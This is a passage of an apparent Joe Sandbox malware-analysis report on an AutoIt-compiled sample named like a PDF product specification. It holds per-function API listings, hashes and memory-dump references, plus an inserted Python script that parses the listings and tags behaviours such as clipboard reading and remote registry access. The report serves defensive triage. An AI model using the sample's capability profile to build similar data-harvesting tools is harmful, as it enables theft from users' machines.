                              • Opcode ID: a77764dc97b758b9f138980a30eafcd252b45b083a0cf55b9ff7e92d3de70106
                              • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                              • Opcode Fuzzy Hash: a77764dc97b758b9f138980a30eafcd252b45b083a0cf55b9ff7e92d3de70106
                              • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
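The per-function "APIs" listings above (the clipboard reader with its CF_UNICODETEXT/CF_TEXT probes, the RegConnectRegistryW/RegCreateKeyExW routine, and the "AutoIt v3 GUI" window constructor) are easier to triage in bulk than by eye. The following Python script is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses listing lines of the shape `• Api.MODULE(args), ref: ADDR` (line format inferred from this page, so the regex is an assumption), resolves the clipboard format constants the sandbox left as raw hex, and tags each function with a behaviour label from a small rule set of my own. The sample listings are copied from the records above.

```python
"""Triage helper for Joe Sandbox per-function API listings (added example)."""
import re
from collections import Counter

# One "APIs" entry. Line format inferred from the listings on this page (assumption);
# "Part of subcall function X:" marks calls made by a callee rather than the function itself.
CALL_RE = re.compile(
    r"^\s*(?:•\s*)?"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Standard clipboard format constants (winuser.h); the sandbox prints arguments in hex.
CF_NAMES = {0x1: "CF_TEXT", 0x2: "CF_BITMAP", 0x8: "CF_DIB", 0xD: "CF_UNICODETEXT", 0xF: "CF_HDROP"}

# Behaviour rules (my own, not Joe Sandbox's): label fires when every API in the set is present.
RULES = {
    "clipboard read": {"OpenClipboard", "GetClipboardData"},
    "registry key create": {"RegCreateKeyExW"},
    "remote registry connect": {"RegConnectRegistryW"},
    "window creation": {"CreateWindowExW"},
}


def parse_calls(listing):
    """Return one dict per API line; headers such as 'APIs'/'Strings' are skipped."""
    calls = []
    for line in listing.splitlines():
        m = CALL_RE.match(line)
        if not m:
            continue
        args = m.group("args")
        calls.append({
            "api": m.group("api"),
            "module": m.group("mod"),
            "args": [] if args is None else args.split(","),
            "ref": int(m.group("ref"), 16),
            "subcall": None if m.group("sub") is None else int(m.group("sub"), 16),
        })
    return calls


def clipboard_formats(calls):
    """Clipboard formats probed or fetched, in first-seen order, resolved to CF_* names."""
    seen = []
    for c in calls:
        if c["api"] in ("IsClipboardFormatAvailable", "GetClipboardData") and c["args"]:
            try:
                fmt = int(c["args"][0], 16)
            except ValueError:
                continue  # '?' means the sandbox could not resolve the argument statically
            name = CF_NAMES.get(fmt, f"0x{fmt:X}")
            if name not in seen:
                seen.append(name)
    return seen


def behaviour_tags(calls):
    apis = {c["api"] for c in calls}
    return sorted(label for label, needed in RULES.items() if needed <= apis)


def summarize(listing):
    calls = parse_calls(listing)
    return {
        "calls": len(calls),
        "modules": dict(Counter(c["module"] for c in calls)),
        "clipboard_formats": clipboard_formats(calls),
        "tags": behaviour_tags(calls),
        # call sites inside this function only (subcall lines excluded)
        "direct_refs": sorted(c["ref"] for c in calls if c["subcall"] is None),
    }


# Sample listings copied from the function records on this page.
CLIPBOARD_LISTING = """APIs
• OpenClipboard.USER32(?), ref: 0046DCE7
• IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
• GetClipboardData.USER32(0000000D), ref: 0046DD01
• CloseClipboard.USER32 ref: 0046DD0D
• GlobalLock.KERNEL32(00000000), ref: 0046DD37
• CloseClipboard.USER32 ref: 0046DD41
• IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
• GetClipboardData.USER32(00000001), ref: 0046DD8D
• CloseClipboard.USER32 ref: 0046DD99
"""

REGISTRY_LISTING = """APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
• RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
• RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
Strings
"""

GUI_LISTING = """APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• GetWindowRect.USER32(?,?), ref: 00471CF7
• CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
"""

if __name__ == "__main__":
    for name, text in (("clipboard", CLIPBOARD_LISTING), ("registry", REGISTRY_LISTING), ("gui", GUI_LISTING)):
        print(name, summarize(text))
```

Running it prints, for the clipboard routine, the two formats in the order the code probes them (CF_UNICODETEXT first, then CF_TEXT as a fallback) and the tag "clipboard read"; the GUI record keeps the `_malloc` subcall out of `direct_refs`, so the refs listed are the ones you would set breakpoints on in this function.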
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                              • API String ID: 1503153545-1459072770
                              • Opcode ID: f2d6726f73004f3d285f80ba49d5ebad33d8f67e86e3dcf49ca09fff6bccecde
                              • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                              • Opcode Fuzzy Hash: f2d6726f73004f3d285f80ba49d5ebad33d8f67e86e3dcf49ca09fff6bccecde
                              • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __wcsicoll$__wcsnicmp
                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                              • API String ID: 790654849-32604322
                              • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                              • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                              • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                              • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f3c6a33133e0ceaaf1d30a9e9da3e996417f0e16fc69e58501023729b1035f0c
                              • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                              • Opcode Fuzzy Hash: f3c6a33133e0ceaaf1d30a9e9da3e996417f0e16fc69e58501023729b1035f0c
                              • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                              APIs
                                • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                              • _fseek.LIBCMT ref: 00452B3B
                              • __wsplitpath.LIBCMT ref: 00452B9B
                              • _wcscpy.LIBCMT ref: 00452BB0
                              • _wcscat.LIBCMT ref: 00452BC5
                              • __wsplitpath.LIBCMT ref: 00452BEF
                              • _wcscat.LIBCMT ref: 00452C07
                              • _wcscat.LIBCMT ref: 00452C1C
                              • __fread_nolock.LIBCMT ref: 00452C53
                              • __fread_nolock.LIBCMT ref: 00452C64
                              • __fread_nolock.LIBCMT ref: 00452C83
                              • __fread_nolock.LIBCMT ref: 00452C94
                              • __fread_nolock.LIBCMT ref: 00452CB5
                              • __fread_nolock.LIBCMT ref: 00452CC6
                              • __fread_nolock.LIBCMT ref: 00452CD7
                              • __fread_nolock.LIBCMT ref: 00452CE8
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                              • __fread_nolock.LIBCMT ref: 00452D78
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                              • String ID:
                              • API String ID: 2054058615-0
                              • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                              • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                              • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                              • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                              APIs
                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Window
                              • String ID: 0
                              • API String ID: 2353593579-4108050209
                              • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                              • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                              • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                              • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                              APIs
                              • GetSysColor.USER32(0000000F), ref: 0044A05E
                              • GetClientRect.USER32(?,?), ref: 0044A0D1
                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                              • GetWindowDC.USER32(?), ref: 0044A0F6
                              • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                              • ReleaseDC.USER32(?,?), ref: 0044A11B
                              • GetSysColor.USER32(0000000F), ref: 0044A131
                              • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                              • GetSysColor.USER32(0000000F), ref: 0044A14F
                              • GetSysColor.USER32(00000005), ref: 0044A15B
                              • GetWindowDC.USER32(?), ref: 0044A1BE
                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                              • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                              • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                              • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                              • ReleaseDC.USER32(?,00000000), ref: 0044A229
                              • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                              • GetSysColor.USER32(00000008), ref: 0044A265
                              • SetTextColor.GDI32(?,00000000), ref: 0044A270
                              • SetBkMode.GDI32(?,00000001), ref: 0044A282
                              • GetStockObject.GDI32(00000005), ref: 0044A28A
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                              • String ID:
                              • API String ID: 1744303182-0
                              • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                              • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                              • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                              • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                              APIs
                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                              • __mtterm.LIBCMT ref: 00417C34
                                • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                              • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                              • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                              • __init_pointers.LIBCMT ref: 00417CE6
                              • __calloc_crt.LIBCMT ref: 00417D54
                              • GetCurrentThreadId.KERNEL32 ref: 00417D80
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                              • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                              • API String ID: 4163708885-3819984048
                              • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                              • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                              • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                              • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID:
                              • String ID: >>>AUTOIT SCRIPT<<<$\
                              • API String ID: 0-1896584978
                              • Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                              • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                              • Opcode Fuzzy Hash: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                              • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __wcsicoll$IconLoad
                              • String ID: blank$info$question$stop$warning
                              • API String ID: 2485277191-404129466
                              • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                              • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                              • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                              • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                              APIs
                              • LoadIconW.USER32(?,00000063), ref: 0045464C
                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                              • SetWindowTextW.USER32(?,?), ref: 00454678
                              • GetDlgItem.USER32(?,000003EA), ref: 00454690
                              • SetWindowTextW.USER32(00000000,?), ref: 00454697
                              • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                              • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                              • GetWindowRect.USER32(?,?), ref: 004546F5
                              • SetWindowTextW.USER32(?,?), ref: 00454765
                              • GetDesktopWindow.USER32 ref: 0045476F
                              • GetWindowRect.USER32(00000000), ref: 00454776
                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                              • GetClientRect.USER32(?,?), ref: 004547D2
                              • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                              • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                              • String ID:
                              • API String ID: 3869813825-0
                              • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                              • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                              • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                              • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                              APIs
                              • _wcslen.LIBCMT ref: 00464B28
                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                              • _wcslen.LIBCMT ref: 00464C28
                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                              • _wcslen.LIBCMT ref: 00464CBA
                              • _wcslen.LIBCMT ref: 00464CD0
                              • _wcslen.LIBCMT ref: 00464CEF
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _wcslen$Directory$CurrentSystem
                              • String ID: D
                              • API String ID: 1914653954-2746444292
                              • Opcode ID: 99bcfad45e429ddb70241ec9039d6b00caad823fb5156a30212311c37a62d784
                              • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                              • Opcode Fuzzy Hash: 99bcfad45e429ddb70241ec9039d6b00caad823fb5156a30212311c37a62d784
                              • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __wcsicoll
                              • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                              • API String ID: 3832890014-4202584635
                              • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                              • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                              • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                              • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                              APIs
                              • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                              • GetFocus.USER32 ref: 0046A0DD
